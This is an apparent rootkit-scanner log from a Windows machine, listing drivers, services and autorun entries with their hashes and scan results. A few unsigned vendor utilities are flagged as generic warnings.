16:00:01.0857 0x42d8 [ A1965DFC0CD91E7CFC42925F8F597274, 7478D7DACD94F0C3D4F0CDAC9CD71CB03CB45C503DE6B1207A51F989844CB1F3 ] TrueSight C:\Windows\System32\drivers\TrueSight.sys
16:00:01.0903 0x42d8 TrueSight - ok
16:00:01.0950 0x42d8 [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
16:00:01.0997 0x42d8 TrustedInstaller - ok
16:00:02.0028 0x42d8 [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
16:00:02.0044 0x42d8 tssecsrv - ok
16:00:02.0059 0x42d8 [ D11C783E3EF9A3C52C0EBE83CC5000E9, A136C355D4C8945729163D15801364A614E23217B15F9313C85BA45BB71A74EB ] TsUsbFlt C:\Windows\system32\drivers\tsusbflt.sys
16:00:02.0075 0x42d8 TsUsbFlt - ok
16:00:02.0075 0x42d8 [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD C:\Windows\system32\drivers\TsUsbGD.sys
16:00:02.0091 0x42d8 TsUsbGD - ok
16:00:02.0122 0x42d8 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
16:00:02.0137 0x42d8 tunnel - ok
16:00:02.0153 0x42d8 [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
16:00:02.0153 0x42d8 uagp35 - ok
16:00:02.0184 0x42d8 [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
16:00:02.0215 0x42d8 udfs - ok
16:00:02.0231 0x42d8 [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect C:\Windows\system32\UI0Detect.exe
16:00:02.0231 0x42d8 UI0Detect - ok
16:00:02.0262 0x42d8 [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
16:00:02.0278 0x42d8 uliagpkx - ok
16:00:02.0309 0x42d8 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus C:\Windows\system32\drivers\umbus.sys
16:00:02.0340 0x42d8 umbus - ok
16:00:02.0340 0x42d8 [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass C:\Windows\system32\drivers\umpass.sys
16:00:02.0356 0x42d8 UmPass - ok
16:00:02.0449 0x42d8 [ 507E96F4BF60BBFBC7FFDC6E2F4A01C9, AA6C0D5245A5F4BAD0D9099DCAD5DF37170FC783966DD9440259F4429147AA75 ] UNS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
16:00:02.0465 0x42d8 UNS - ok
16:00:02.0496 0x42d8 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost C:\Windows\System32\upnphost.dll
16:00:02.0543 0x42d8 upnphost - ok
16:00:02.0590 0x42d8 [ C9E9D59C0099A9FF51697E9306A44240, 78D9A7A5E5742962B6978F475BF06CB32262F1D214699D3D40538476A58012A1 ] USBAAPL64 C:\Windows\system32\Drivers\usbaapl64.sys
16:00:02.0590 0x42d8 USBAAPL64 - ok
16:00:02.0637 0x42d8 [ 91D3C92A44FC682DD791147604E79152, AA0B6799BF9C26C2C1793C91295288A4989AA43EC5E070B650DA7F0A142817CE ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
16:00:02.0668 0x42d8 usbccgp - ok
16:00:02.0699 0x42d8 [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir C:\Windows\system32\drivers\usbcir.sys
16:00:02.0715 0x42d8 usbcir - ok
16:00:02.0746 0x42d8 [ F7FFDF2A1D19A76A87759126B244C816, C91F09D77E22D976952A46F7B93F611B719EDAF694D538242FA8FAF1BA9BB2F0 ] usbehci C:\Windows\system32\drivers\usbehci.sys
16:00:02.0761 0x42d8 usbehci - ok
16:00:02.0808 0x42d8 [ 245FE7FC634D6A993E682E0A9EBA4ABB, F7A536D215EE3A63358EC8B5946D7BB3B56357BF91347B07013E00DAC98775B6 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
16:00:02.0839 0x42d8 usbhub - ok
16:00:02.0855 0x42d8 [ C1A8966E0D09BFB501045105B30D86F2, 5BB95FBA441B898E258A3BFE174FC1042A04C19E25C59DE1FD90594290B11DA9 ] usbohci C:\Windows\system32\drivers\usbohci.sys
16:00:02.0855 0x42d8 usbohci - ok
16:00:02.0902 0x42d8 [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
16:00:02.0933 0x42d8 usbprint - ok
16:00:02.0964 0x42d8 [ 73B84C8CE467E81A94D4194F8009F2A0, 65CB7C61F4675C2D8EB5C5454577E7AD36F9D390F08E59EAF1765761B97424FB ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
16:00:02.0995 0x42d8 USBSTOR - ok
16:00:03.0027 0x42d8 [ 2E682DCE4319A90E02A327F8A427544A, 3528C5A4669BAD53041085C3E72C64388D308E42AD9D1FAC85B6F2FFD81610FB ] usbuhci C:\Windows\system32\drivers\usbuhci.sys
16:00:03.0042 0x42d8 usbuhci - ok
16:00:03.0089 0x42d8 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo C:\Windows\System32\Drivers\usbvideo.sys
16:00:03.0120 0x42d8 usbvideo - ok
16:00:03.0151 0x42d8 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms C:\Windows\System32\uxsms.dll
16:00:03.0183 0x42d8 UxSms - ok
16:00:03.0183 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc C:\Windows\system32\lsass.exe
16:00:03.0198 0x42d8 VaultSvc - ok
16:00:03.0229 0x42d8 [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot C:\Windows\system32\drivers\vdrvroot.sys
16:00:03.0245 0x42d8 vdrvroot - ok
16:00:03.0276 0x42d8 [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds C:\Windows\System32\vds.exe
16:00:03.0307 0x42d8 vds - ok
16:00:03.0323 0x42d8 [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
16:00:03.0339 0x42d8 vga - ok
16:00:03.0354 0x42d8 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave C:\Windows\System32\drivers\vga.sys
16:00:03.0385 0x42d8 VgaSave - ok
16:00:03.0401 0x42d8 [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp C:\Windows\system32\drivers\vhdmp.sys
16:00:03.0417 0x42d8 vhdmp - ok
16:00:03.0448 0x42d8 [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide C:\Windows\system32\drivers\viaide.sys
16:00:03.0463 0x42d8 viaide - ok
16:00:03.0495 0x42d8 [ E29564BECE3087DB4685A467957D5C2F, FA81ECF1B85DC8DE6BE2357E386975C5BC138BA4C847AB3204D6B0D616CB99E0 ] ViWDM C:\Windows\system32\DRIVERS\ViWDM.SYS
16:00:03.0526 0x42d8 ViWDM - ok
16:00:03.0557 0x42d8 [ F6151F63A8E9C92A9AE8181DDDFF3A9A, DBDBA36DFC2A366F3B1DBC07035D5EB18E7B7B7E6CABA907F53462E70BBDB0E8 ] volmgr C:\Windows\system32\drivers\volmgr.sys
16:00:03.0573 0x42d8 volmgr - ok
16:00:03.0588 0x42d8 [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
16:00:03.0604 0x42d8 volmgrx - ok
16:00:03.0635 0x42d8 [ DF8126BD41180351A093A3AD2FC8903B, AEFF4AA89CDDAAAD43CDE17C6B6EB2A397A0AC1651CBD51B889161EC2BC6527A ] volsnap C:\Windows\system32\drivers\volsnap.sys
16:00:03.0651 0x42d8 volsnap - ok
16:00:03.0697 0x42d8 [ DDF7522FBEF8D50E015E743813595801, F4839D7BC540219463A52E85370B6CD77CFDD8E3068869BAF52DB9F7FAC0C2EB ] vrvd5 C:\Windows\system32\DRIVERS\vrvd5.sys
16:00:03.0744 0x42d8 vrvd5 - ok
16:00:03.0791 0x42d8 [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
16:00:03.0807 0x42d8 vsmraid - ok
16:00:03.0885 0x42d8 [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS C:\Windows\system32\vssvc.exe
16:00:03.0931 0x42d8 VSS - ok
16:00:03.0947 0x42d8 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus C:\Windows\system32\DRIVERS\vwifibus.sys
16:00:03.0978 0x42d8 vwifibus - ok
16:00:03.0994 0x42d8 [ 13A0DECD1794DE60A8427862C8669D27, 4024AF9F2F052BC80C85F5B9A671499C20AF38838206CC649E6EFE37C380D3BF ] vwififlt C:\Windows\system32\DRIVERS\vwififlt.sys
16:00:04.0009 0x42d8 vwififlt - ok
16:00:04.0041 0x42d8 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\Windows\system32\w32time.dll
16:00:04.0072 0x42d8 W32Time - ok
16:00:04.0087 0x42d8 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
16:00:04.0103 0x42d8 WacomPen - ok
16:00:04.0134 0x42d8 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
16:00:04.0165 0x42d8 WANARP - ok
16:00:04.0165 0x42d8 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
16:00:04.0181 0x42d8 Wanarpv6 - ok
16:00:04.0259 0x42d8 [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc C:\Windows\system32\Wat\WatAdminSvc.exe
16:00:04.0290 0x42d8 WatAdminSvc - ok
16:00:04.0368 0x42d8 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\Windows\system32\wbengine.exe
16:00:04.0399 0x42d8 wbengine - ok
16:00:04.0415 0x42d8 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
16:00:04.0446 0x42d8 WbioSrvc - ok
16:00:04.0462 0x42d8 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
16:00:04.0477 0x42d8 wcncsvc - ok
16:00:04.0493 0x42d8 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
16:00:04.0509 0x42d8 WcsPlugInService - ok
16:00:04.0524 0x42d8 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
16:00:04.0540 0x42d8 Wd - ok
16:00:04.0571 0x42d8 [ A3D04EBF5227886029B4532F20D026F7, D90F7B9C176008675DA0B5FD7E4973CBC2A04172CEDF8FB7D3B3B4F27B5440D7 ] WDC_SAM C:\Windows\system32\DRIVERS\wdcsam64.sys
16:00:04.0602 0x42d8 WDC_SAM - ok
16:00:04.0665 0x42d8 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
16:00:04.0696 0x42d8 Wdf01000 - ok
16:00:04.0711 0x42d8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\Windows\system32\wdi.dll
16:00:04.0711 0x42d8 WdiServiceHost - ok
16:00:04.0727 0x42d8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\Windows\system32\wdi.dll
16:00:04.0743 0x42d8 WdiSystemHost - ok
16:00:04.0774 0x42d8 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\Windows\System32\webclnt.dll
16:00:04.0789 0x42d8 WebClient - ok
16:00:04.0821 0x42d8 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
16:00:04.0852 0x42d8 Wecsvc - ok
16:00:04.0867 0x42d8 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
16:00:04.0883 0x42d8 wercplsupport - ok
16:00:04.0914 0x42d8 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
16:00:04.0930 0x42d8 WerSvc - ok
16:00:04.0961 0x42d8 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
16:00:04.0977 0x42d8 WfpLwf - ok
16:00:05.0008 0x42d8 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
16:00:05.0008 0x42d8 WIMMount - ok
16:00:05.0023 0x42d8 WinDefend - ok
16:00:05.0039 0x42d8 WinHttpAutoProxySvc - ok
16:00:05.0101 0x42d8 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
16:00:05.0148 0x42d8 Winmgmt - ok
16:00:05.0226 0x42d8 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\Windows\system32\WsmSvc.dll
16:00:05.0289 0x42d8 WinRM - ok
16:00:05.0351 0x42d8 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
16:00:05.0367 0x42d8 WinUsb - ok
16:00:05.0413 0x42d8 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
16:00:05.0445 0x42d8 Wlansvc - ok
16:00:05.0507 0x42d8 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
16:00:05.0523 0x42d8 wlcrasvc - ok
16:00:05.0679 0x42d8 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:00:05.0741 0x42d8 wlidsvc - ok
16:00:05.0772 0x42d8 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
16:00:05.0803 0x42d8 WmiAcpi - ok
16:00:05.0835 0x42d8 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
16:00:05.0850 0x42d8 wmiApSrv - ok
16:00:05.0881 0x42d8 WMPNetworkSvc - ok
16:00:05.0944 0x42d8 [ 58540037A4A3EEEEFA47C84100E1694F, 9BB055D008F1BC55E4361BBDB525CAD2E2E0ED7CFF1AA34A9BA7BEEDEA1A4B08 ] WMZuneComm C:\Program Files\Zune\WMZuneComm.exe
16:00:05.0975 0x42d8 WMZuneComm - ok
16:00:05.0991 0x42d8 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
16:00:06.0006 0x42d8 WPCSvc - ok
16:00:06.0022 0x42d8 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
16:00:06.0037 0x42d8 WPDBusEnum - ok
16:00:06.0053 0x42d8 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
16:00:06.0069 0x42d8 ws2ifsl - ok
16:00:06.0084 0x42d8 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\system32\wscsvc.dll
16:00:06.0115 0x42d8 wscsvc - ok
16:00:06.0115 0x42d8 WSearch - ok
16:00:06.0209 0x42d8 [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv C:\Windows\system32\wuaueng.dll
16:00:06.0271 0x42d8 wuauserv - ok
16:00:06.0303 0x42d8 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
16:00:06.0318 0x42d8 WudfPf - ok
16:00:06.0349 0x42d8 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
16:00:06.0349 0x42d8 WUDFRd - ok
16:00:06.0365 0x42d8 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
16:00:06.0381 0x42d8 wudfsvc - ok
16:00:06.0396 0x42d8 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
16:00:06.0412 0x42d8 WwanSvc - ok
16:00:06.0693 0x42d8 [ D6EF205269C2A584AF6B56B9F95010F8, C414FF4805C5FE47E5B9E9694419AE08CBEA26ECEF1F977742B23AFA032CE8E1 ] ZuneNetworkSvc C:\Program Files\Zune\ZuneNss.exe
16:00:06.0973 0x42d8 ZuneNetworkSvc - ok
16:00:07.0005 0x42d8 [ 7A565AFE58F3822A9E622868E5CC0E5C, E09EF57D7739BF09EAF7A20199107D84F1290F9C34B9D3E6446A0215A8BE1990 ] ZuneWlanCfgSvc C:\Program Files\Zune\ZuneWlanCfgSvc.exe
16:00:07.0020 0x42d8 ZuneWlanCfgSvc - ok
16:00:07.0036 0x42d8 ================ Scan global ===============================
16:00:07.0067 0x42d8 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
16:00:07.0114 0x42d8 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:00:07.0129 0x42d8 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:00:07.0161 0x42d8 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
16:00:07.0192 0x42d8 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
16:00:07.0192 0x42d8 [ Global ] - ok
16:00:07.0192 0x42d8 ================ Scan MBR ==================================
16:00:07.0207 0x42d8 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
16:00:07.0457 0x42d8 \Device\Harddisk0\DR0 - ok
16:00:07.0457 0x42d8 ================ Scan VBR ==================================
16:00:07.0457 0x42d8 [ 2EA9BF8CDE8B71F3CA2C1BC9FEF1EED1 ] \Device\Harddisk0\DR0\Partition1
16:00:07.0488 0x42d8 \Device\Harddisk0\DR0\Partition1 - ok
16:00:07.0488 0x42d8 ================ Scan generic autorun ======================
16:00:07.0707 0x42d8 [ 4058D1C660E32D6E6A2C2B672640EF60, 8F655773C4909365A41358CEF6CB7C399A104ECDAA1B9EAFB26269A8EF413ACA ] C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
16:00:07.0800 0x42d8 FspUip - ok
16:00:07.0925 0x42d8 [ 5EE06BCE2FCC6A6224FC146FBDF78B2E, C9A82EFD1DAF9571C29E87096F5BFE1CBFD98F0AB36428FF43DC6E59BEB6823A ] C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
16:00:07.0956 0x42d8 SRS Premium Sound HD - ok
16:00:07.0987 0x42d8 [ 7307AEC9FA7F0872A26F4B5D2E8B623A, 95C9EED87278F638C8DAEDBE0ECB10F8FC725623AB707DD7C36F3A11A361BE52 ] C:\Windows\system32\igfxtray.exe
16:00:08.0019 0x42d8 IgfxTray - ok
16:00:08.0065 0x42d8 [ 053C46FD07C5FB6D4C73FCC7DE72D3D3, D636554AA1C8899C7B85ABE27194F8BFE6002634CE69BCD7127F3081C6E79B81 ] C:\Windows\system32\hkcmd.exe
16:00:08.0097 0x42d8 HotKeysCmds - ok
16:00:08.0112 0x42d8 [ 5ED0DF577AC20A47685DE15D25C077D8, 72B33534D88C0AA944A548489E05C500D1A45FA9818446C7CC9E111DE9C8C1F3 ] C:\Windows\system32\igfxpers.exe
16:00:08.0128 0x42d8 Persistence - ok
16:00:08.0206 0x42d8 [ 048FA2F7B7F5292ABD6FE52D360708AB, CD3E9897D706D2D3E7F4492432BC69182201FAB0E85C58683E82094C7AD5F303 ] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
16:00:08.0237 0x42d8 AtherosBtStack - detected UnsignedFile.Multi.Generic ( 1 )
16:00:10.0811 0x42d8 Detect skipped due to KSN trusted
16:00:10.0811 0x42d8 AtherosBtStack - ok
16:00:10.0889 0x42d8 [ F282E6109982A4ABDD925BA3F6EE04AB, 1D8C98549D7A02F9228C3FB122A07F8E87ACE936FEC6FD3B5F517243F330E951 ] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
16:00:10.0920 0x42d8 AthBtTray - detected UnsignedFile.Multi.Generic ( 1 )
16:00:13.0510 0x42d8 Detect skipped due to KSN trusted
16:00:13.0510 0x42d8 AthBtTray - ok
16:00:13.0650 0x42d8 [ A6AAD37CDCAE75CB62D039E3A4D8F5E3, 4FF763B0D129175BA1B1E794BA313E6C63F7A89D377C786BF5E730AF2A1D95D1 ] c:\Program Files\Microsoft Security Client\msseces.exe
16:00:13.0681 0x42d8 MSC - ok
16:00:13.0759 0x42d8 [ B1964E8776FD7633F149788F5B2A71CB, E30AC137B9DC2D3456499E0BB3B1955D2E0F7FFDB11E7A290A9DA25C76F4FAF8 ] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
16:00:13.0791 0x42d8 CDAServer - ok
16:00:13.0853 0x42d8 [ 4D1DA8CE5E364D22B4FF00F163194514, 165DE474309206A0F51266F19EDB4AF3D7BAD19FDA61B636AEE7A04278DBBC2C ] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
16:00:13.0884 0x42d8 USB3MON - ok
16:00:14.0118 0x42d8 [ 2F816382F8F0D1EA7125E14467788FA2, E5397C0CA572DCBD9156F889AD9E790EBC22CE18DF3653340A93772A3A3925D4 ] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
16:00:14.0368 0x42d8 OSD Utility - detected UnsignedFile.Multi.Generic ( 1 )
16:00:18.0049 0x42d8 OSD Utility ( UnsignedFile.Multi.Generic ) - warning
16:00:20.0686 0x42d8 [ F4FEC311177C29BF7FF3A1B6002B3B64, A51312B76D0187BF729BE75A3AA404F3EFDA25B33DBC2D2B1B6218ECEC4E8429 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe
16:00:20.0701 0x42d8 Adobe Reader Speed Launcher - ok
16:00:20.0779 0x42d8 [ 94A4D6915D4F572309DF6137E1846528, E46BDF83CAA6683AA655DBA3D2C8DC7AC06251E952466A20CFDA3A16B1840455 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
16:00:20.0795 0x42d8 APSDaemon - ok
16:00:20.0857 0x42d8 [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
16:00:20.0889 0x42d8 Adobe ARM - ok
16:00:20.0935 0x42d8 [ 79C28DDF889C26FDD6162F796FD49BC4, C1E2468B4F0F52BD707D16656F33CC438AF8E18A38BB6CFB64D11F23993F72F0 ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
16:00:20.0967 0x42d8 iTunesHelper - ok
16:00:21.0029 0x42d8 [ 14D6542607ACD4B2D1DDB1A36E0D8813, 3A270600549E8E7988D5AF3486C0F504269B9573393D87BF87BDB2287BF007B2 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
16:00:21.0045 0x42d8 SunJavaUpdateSched - ok
